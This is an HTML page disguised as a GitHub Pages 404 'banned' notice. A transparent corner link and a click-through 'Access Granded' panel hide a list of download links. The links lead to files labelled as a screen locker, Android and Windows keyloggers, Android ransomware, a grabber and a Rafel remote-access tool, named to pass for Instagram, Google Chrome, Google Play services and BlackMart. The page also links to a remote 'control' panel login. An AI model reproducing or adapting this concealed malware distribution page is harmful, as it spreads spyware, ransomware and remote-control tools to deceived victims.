<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins&display=swap" rel="stylesheet">
    <title>Hello Wel</title>
  </head>
  <style>
    .name {
      position: fixed;
      bottom: 0px;
      right: 0px;
      text-decoration: none;
      height: 50px;
      width: 50px;
      opacity: 0;
      cursor: default;
    }
    .head{
    font-size: 60px;
    text-align:center;
    }
    .sub{
    margin-top:-40px;
    text-align: center;
    }
    .sub1{
    margin-top:-10px;
    text-align: center;
    }
    .hedd{
      visibility: hidden;
      height: 0px;
      width: 230px;
      margin: auto;
      width: 40%;
      padding: 10px;
      text-align: center;
      background-color: #ffcc61;
      font-family: 'Poppins', sans-serif;
      border-radius: 15px;
      margin-top: 50px;
      opacity: 0;
      transition: 1s;
    }
    .hedd:hover{
      opacity: 1;
    }
    .mmain1{
      visibility: hidden;
      margin-top: 0px;

    }
  </style>
  <body>
    <div id="heddd">
    <p class="head">404</p>
    <p class="sub">There isn't a GitHub Pages site here.</p>
    <p class="sub1">This web page is banned</p>
    <a class="name" onclick="hed()"> Hellllo</a>
    </div>
    <div class="hedd" id="navlinks" onclick="main()">
      <a style="text-decoration: none; cursor: default; ">
      <h1 style="margin-bottom: 5px; color: black">Hello</h1>
      <p style="margin-top: 2px; color: black;">Access Granded</p>
    </a>
    </div>
    <div id="mmain" class="mmain1">
      <h1>OOOOi Kooooi....... Bhat U Bant</h1>
<h3>onn poyi tharooooo</h3>
<p>Airavat <a href="https://github.com/dratdb/dumbfiles/raw/main/Instagram.apk" download>hello</a></p>
<p>Scr33n L0K3r <a href="https://github.com/dratdb/dumbfiles/raw/main/LockBuild.exe" download>hello</a></p>
<p>androdi ke6yl003ger <a href="https://github.com/dratdb/dumbfiles/raw/main/Google%20play%20services%20v1.5.8.apk" download>hello</a></p>
<p>androdi ke6yl003ger <a href="https://github.com/dratdb/dumbfiles/raw/main/apppp.apk" download>doge coin</a></p>
<p>androo ransomeveer<a href="https://github.com/dratdb/dumbfiles/raw/main/OpenIt.apk">Hello</a></p>
<p>choas.... ..<a href="https://github.com/dratdb/dumbfiles/raw/main/app.exe">Hello</a></p>
<p>W1n70ws k3l009er<a href="https://github.com/dratdb/dumbfiles/raw/main/Google%20Chrome.exe">Hello</a></p>
<p>D0ta g3bb3r w7nd0ws<a href="https://github.com/dratdb/dumbfiles/raw/main/Built1.exe">Hello</a></p>
<p>rafel- undrood<a href="https://github.com/dratdb/dumbfiles/raw/main/BlackMart.apk">Hello</a> <a href="https://cesural-electrician.000webhostapp.com/Server_Panel/public/login.php">cuntrool</a></p>


    </div>
    <script>
        var navlinks = document.getElementById("navlinks");

        function hed(){
            navlinks.style.visibility = "visible";
            heddd.style.display = "none";
            navlinks.style.height = "130px";

        }
        function main(){
          mmain.style.visibility = "visible";
          navlinks.style.visibility = "visible";
          navlinks.style.height = "0px";
          navlinks.style.opacity = "0";
        }
    </script>
  </body>
</html>
